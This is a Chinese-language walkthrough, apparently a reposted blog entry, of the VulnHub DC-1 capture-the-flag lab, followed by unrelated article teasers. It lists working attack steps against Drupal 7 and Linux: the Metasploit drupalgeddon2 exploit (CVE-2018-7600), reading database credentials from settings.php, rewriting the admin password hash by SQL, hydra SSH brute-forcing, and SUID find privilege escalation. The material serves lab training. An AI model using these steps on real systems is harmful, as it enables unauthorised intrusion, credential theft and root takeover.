vulnhub练习 DC-1复现及分析

news2024/12/23 8:41:45

一、搭建环境

1.工具

靶机:DC-1 192.168.200.17

攻击机:kali 192.168.200.13

2.注意

攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式)

DC-1网络设计

点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别

1703569888_658a69e08ecac02aa57db.png!small?1703569888724

KALI网络设计

1703569896_658a69e8e97edcedd6dc5.png!small?1703569897084

二、信息收集

根据题意,需要得知靶机DC-1的IP地址、IP地址开放的端口及网站的指纹信息

1.扫描靶机IP地址

收集在某网段上存活的主机方式有很多种,常见的、易记忆的有arp-scan、nmap、netdiscover

arp-scan:arp-scan -l

1703569905_658a69f15254dbe5c5905.png!small?1703569906841

nmap:nmap -sP 192.168.200.0/24 -T4	 

1703569913_658a69f96a0680ffca989.png!small?1703569913932

netdiscover:netdiscover  #较慢可加参数

1703569919_658a69ffe850f2aa795f8.png!small?1703569920217

2.扫描目标IP开放端口

nmap -sV -p- 192.168.200.17 
#-sV  扫描目标主机端口上运行的软件信息
#-p-  扫描全部端口0-65535

1703569928_658a6a083f37cbc389000.png!small?1703569928801

尝试访问http80端口,一般可以直接访问

3.获取指纹信息

利用插件wappalyzer可以知道网站的指纹信息

1703569938_658a6a126df4c12bec4d6.png!small?1703569938851
亦可以利用kali中的自带工具whatqweb工具

whatweb -v 192.168.200.17

1703569947_658a6a1be3ecec71bb62c.png!small?1703569948145

从以上便两种方式都可以看出网站的cms是Drupal 7

世界上有名的CMS 其中就包括Drupal
还有wordpress、 joomla等等

附:然后就可以百度或者谷歌探测此cms包含的漏洞浮现文章,当然亦可以根据扫描出的其他信息寻找浮现文章学习。

1703569958_658a6a26cc682b6a63ab0.png!small?1703569959387

另外,经过测试22端口和111端口都是无法进行访问,网站是做了某些限制的。

4.目录扫描

部分结果

1703569966_658a6a2ebe598dcf67048.png!small?1703569967605

三、漏洞利用

Metasploit利用

先打开kali

msfconsole

1703569976_658a6a383899e9685f298.png!small?1703569976686

查询模块

search drupal

利用2018年的这个漏洞(远程代码执行)

漏洞编号:CVE-2018-7600

Drupal 6,7,8等多个子版本存在远程代码执行漏洞

1703569983_658a6a3f1192c739df2cc.png!small?1703569983746

use exploit/unix/webapp/drupal_drupalgeddon2

查看漏洞参数

show options

Current Setting是需要设置的内容

Required表示设置的要求,yes为必须,no可以设置也可不设置

1703569991_658a6a4708ffa5bd99a12.png!small?1703569991822

那就在RHOST位置设置IP地址(靶机的IP地址)

set RHOSTS 192.168.200.17

再次查询

1703569999_658a6a4f8f56a31e10649.png!small?1703569999904

利用参数exploit开始攻击

exploit

看到如下参数,则说明攻击机kali和靶机DC-1建立连接

Meterpreter session 1 opened (192.168.200.14:4444 -> 192.168.200.17:56719) at 2023-07-18 23:10:24 -0400

1703570008_658a6a58db6864ce1a3cf.png!small?1703570009404

获取shell

shell

当前路径

1703570020_658a6a645be92e957d67d.png!small?1703570020478

执行ls查看当前路径下的文件,可以看到flag1出现

flag1

1703570029_658a6a6dce9fa2aa6631d.png!small?1703570030062

反弹shell

要求攻击机上需要装python环境

python -c 'import pty; pty.spawn("/bin/bash")'

1703570040_658a6a78ebf722e526ac8.png!small?1703570041027

之句话意思是:每个好的CMS都需要一个配置文件,你也一样 说明需要找到配置文件

此CMS的配置文件名叫做settings.php

查询他所在的位置即可

cat sites/default/settings.php

flag2

告知数据库的类型是:mysql

1703570048_658a6a8056ccbcc63afb0.png!small?1703570048939

另外也可以使用:模糊查找的方式

cat `find / -name settings.php`

1703570056_658a6a88dfb835ec11744.png!small?1703570057591

英文的意思大概是:

暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。您可以使用这些凭据做什么?

大概意思是提权了

连接数据库

用给出的密码和数据名尝试连接数据库爆破

mysql -udbuser -pR0ck3t

连接成功!

1703570066_658a6a92e8c0146c66376.png!small?1703570067566

查询数据库

show databases;

1703570074_658a6a9a09d614f39106a.png!small?1703570074339

利用数据库

use drupaldb;

1703570085_658a6aa529be9a662d0c2.png!small?1703570085373

查询数据表

1703570093_658a6aad57199cca25df2.png!small?1703570093535

查询users表信息

select * from users;

获取账户和密码

1703570101_658a6ab5dc512aed2c7f7.png!small?1703570102285

两个账户信息

密码不是明文,不知道是什么类型

admin S S SDvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

Fred S S SDWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

解决方法:

看到两个用户的密码被加密了,但可以修改密码或新增一个admin权限的用户

方法一:修改admin密码

使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户

先找到机密文件,加密脚本位置在/var/www/scripts/password-hash.sh下

/var/www/scripts/password-hash.sh

先退出mysql的命令行,打开加密脚本,可以看到此加密脚本使用php编写的

cat /var/www/scripts/password-hash.sh

1703570113_658a6ac163512d7e82c8d.png!small?1703570113922

用dupal自带脚本生成admin的密码为admin

php /var/www/scripts/password-hash.sh admin
username: admin    hash: $S$Dhk7CjZDCy.ZjoGxxBWmfuzwUiGVZZAqOvNz4Ah0w72GQV5tLj5i

用上图重新users表

update users set pass = "$S$Dhk7CjZDCy.ZjoGxxBWmfuzwUiGVZZAqOvNz4Ah0w72GQV5tLj5i" where name = 'admin' ;
username:admin      hash:$S$Dhk7CjZDCy.ZjoGxxBWmfuzwUiGVZZAqOvNz4Ah0w72GQV5tLj5i

方法二:添加admin权限用户

drupal 7(7.0~7.31)有SQL注入的漏洞(Drupal SQL注入漏洞(CVE-2014-3704)复现),可以添加一个admin权限的用户,然后再在msf找一下这个工具

searchsploit drupal

1703570123_658a6acb007f30df33f9c.png!small?1703570123830

查看脚本文件

searchsploit 34992.py -p

1703570131_658a6ad3f1d0c45a6fda0.png!small?1703570132243

登录账户admin,发现第flag3

flag3

1703570139_658a6adbcb37fb28b06e6.png!small?1703570139970

主要在这两个单词:passwd和shadow,linux下的文件

/etc/passwd

/etc/shadow

cat /etc/passwd

有flag4这个用户,两个方法拿到这个用户的密码,一个是弱口令爆破,另一个提权打开shadow文件查看密码

1703570147_658a6ae3655d7d0510f29.png!small?1703570148380

而另一个是权限不够,当前用户是www-data需要root权限

1703570155_658a6aeb9f7276960c300.png!small?1703570155711

切换目录带到目标文件下flag4.txt,看内容

flag4

第一种方式:

1703570162_658a6af29d48516030869.png!small?1703570163267

提权至root权限,找最后的flag了,使用find命令查找有特殊权限suid的命令:find / -perm -4000

1703570171_658a6afb00ddd9debcab8.png!small?1703570171724

发现flag4,并且flag4是一个用户,flag4用户密码可以使用ssh登录进行爆破

再使用find 命令进行提权:find ./misc -exec “/bin/sh” ;获取root 权限,

1703570180_658a6b042487c9e803207.png!small?1703570180380

第二种方式

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz   #下载John密码包
tar -xvf john-1.8.0.tar.gz  #解压缩
cd john-1.8.0/ src    #进入源码目录下
uname -a  #查看当前系统版本
make linux-x86-64   #编译并指定当前的Linux系统版本

使用hydra+John密码包对flag4的密码进行爆破,爆破密码为:flag4/orange

1703570189_658a6b0d386ecedc4a168.png!small?1703570189384

flag4用户使用ssh登录

ssh flag4@192.168.200.17

1703570195_658a6b13c6d3d96bc705a.png!small?1703570196099

此时发现是flag4用户,而不是root,用上边同样的方法,find命令提权为root。

1703570202_658a6b1ac5e4334a06567.png!small?1703570203009

thefinalflag.txt

在root目录下发现最后的flag

1703570211_658a6b23e5b3438cc9f5e.png!small?1703570212288

五、总结

1.扫描局域网主机

arp-scan -l

netdiscover用法

map -sP x.x.x.x

2.开放端口扫描

nmap -sV -p- x.x.x.x

2.MSF使用

3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100

hydra+John密码包

以上两种方式可以爆出flag4的密码

4.suid提权:Linux下用SUID提权、find命令exec

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1461167.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

unity学习(28)——登录功能

有之前注册的知识,登录就很容易处理了。 登陆成功返回id: 登录失败返回null: 测试同一账号不能重复登陆!登录成功后最好可以跳到新的场景中 结果是好的,去服务器看一下对应部分的代码,可见,登…

多端开发围炉夜话

文章目录 一、多端开发 一、多端开发 uni-app 官网 UNI-APP中的UI框架:介绍常用的UI框架及其特点 uView UIVant WeappColor UIMint UI uniapp嵌入android原生开发的功能 uniapp使用安卓原生sdk uni-app中的uni.requireNativePlugin Qt for iOS Qt for Android

Deep Layer Aggregation(CVPR 2018)原理与代码解析

paper:Deep Layer Aggregation official implementation:https://github.com/ucbdrive/dla third-party implementation:https://github.com/huggingface/pytorch-image-models/blob/main/timm/models/dla.py 本文的创新点 骨干网络的设计…

Spring Boot利用Kaptcha生成验证码

生成验证码 我们在登录或注册某个网站的时候,会需要我们输入验证码,才能登录注册,那么如何生成验证码呢?其实,生成验证码我们可以用Java Swing在后台内存里的区域画一个出来,但是非常麻烦,所以…

Linux系统——nginx服务介绍

一、Nginx——高性能的Web服务端 Nginx的高并发性能优于httpd服务 1.nginx概述 Nginx是由1994年毕业于俄罗斯国立莫斯科鲍曼科技大学的同学为俄罗斯rambler.ru公司开发的,开发工作最早从2002年开始,第一次公开发布时间是2004年10月4日,版本…

KubeSphere 镜像构建器(S2I)服务证书过期解决方案

目前 KubeSphere 所有 3.x.x 版本,如果开启了 DevOps 模块并使用了镜像构建器功能(S2I)都会遇到证书过期问题。 解决方法 已开启 DevOps 模块 下载这个更新 S2I 服务证书压缩包,上传到任一可以访问 K8s 集群的节点; …

Java Web(一)--介绍

Java Web 技术体系图 三大组成部分: 前端: 前端开发技术工具包括三要素:HTML、CSS 和 JavaScript;其他高级的前端框架,如bootstrap、jquery,VUE 等。 后端: 后端开发技术工具主要有&am…

PiflowX-组件UnionAll

UnionAll组件 组件说明 Union多个输入源。输入源必须具有相同的字段类型。 计算引擎 flink 组件分组 common 端口 Inport:Any outport:默认端口 组件属性 名称展示名称默认值允许值是否必填描述例子inportsInports“”无否Inports string are…

Atcoder ABC341 A - Print 341

Print 341(输出 341) 时间限制:2s 内存限制:1024MB 【原题地址】 所有图片源自Atcoder,题目译文源自脚本Atcoder Better! 点击此处跳转至原题 【问题描述】 【输入格式】 【输出格式】 【样例1】 【样例输入1】 …

基于python-socket构建任务服务器(基于socket发送指令创建、停止任务)

在实现ia业务服务器时需要构建一个python-socket客户端,1、要求能与服务器保持心跳连接,每10秒钟发送一次心跳信号;2、要求能根据socket服务器发送的指令创建或终止一个定时任务。 为此以3个类实现该功能,分别为socket通信类&…

Hypervisor是什么

Hypervisor 通常指的是虚拟机监视器(VirtualMachine Monitor),它是一种软件或硬件,可以在物理服务器上创建和管理多个虚拟机(VirtualMachine)。 Hypervisor 提供了一个抽象层,将物理服务器的资源…

基于SpringBoot的农产品智慧物流系统

文章目录 项目介绍主要功能截图:部分代码展示设计总结项目获取方式 🍅 作者主页:超级无敌暴龙战士塔塔开 🍅 简介:Java领域优质创作者🏆、 简历模板、学习资料、面试题库【关注我,都给你】 &…

Redis之缓存击穿问题解决方案

文章目录 一、书接上文二、介绍三、解决方案1. 单例双检锁2. 缓存预热和定时任务 一、书接上文 Redis之缓存雪崩问题解决方案 二、介绍 缓存击穿就是大量并发访问同一个热点数据,一旦这个热点数据缓存失效,则请求压力都来到数据库。 三、解决方案 1…

​LeetCode解法汇总106. 从中序与后序遍历序列构造二叉树

目录链接: 力扣编程题-解法汇总_分享记录-CSDN博客 GitHub同步刷题项目: https://github.com/September26/java-algorithms 原题链接: 力扣(LeetCode)官网 - 全球极客挚爱的技术成长平台 描述: 给定两个…

惠尔顿 网络安全审计系统 任意文件读取漏洞复现

0x01 产品简介 惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块&#xff1b…

Dockerfile文件中只指定挂载点会发生什么?

当你在VOLUME指令中只指定容器内的路径(挂载点)而不指定宿主机的目录时,Docker会为该挂载点自动生成一个匿名卷。这个匿名卷存储在宿主机的某个位置,但这个具体位置是由Docker自动管理的,用户通常不需要关心这个存储位…

哪些工具可以改变手机电脑网络IP地址?

在互联网时代,网络已经成为了我们日常生活中不可或缺的一部分。然而,随着网络的普及和技术的不断发展,网络安全问题也日益凸显。为了保护个人隐私和信息安全,我们需要了解一些工具可以改变手机电脑网络IP地址的知识。 首先&#x…

谈谈我对低代码开发平台的理解

目录 一、前言 二、低代码谜团 三、低代码能解决哪些问题 四、好用的低代码平台 五、总结 一、前言 低代码“灵活、快速、低门槛”的标签,为其带来了诸多争议。在低代码平台上是否只能搭建极其简单、无亮点的小功能?低代码带来的“全民程序员”化是…

Java线程池知识点总结

1、线程池优势: 降低资源消耗。通过重复利用已创建的线程降低线程创建和销毁造成的消耗。提高响应速度。当任务到达时,任务可以不需要等到线程创建就能立即执行。提高线程的可管理性。线程是稀缺资源,如果无限制的创建,不仅会消耗…

Unity MVC开发模式与开发流程详解

在Unity游戏开发中,采用MVC(Model-View-Controller)模式是一种非常常见的设计模式。MVC模式将应用程序分为三个部分:模型(Model)、视图(View)和控制器(Controller&#x…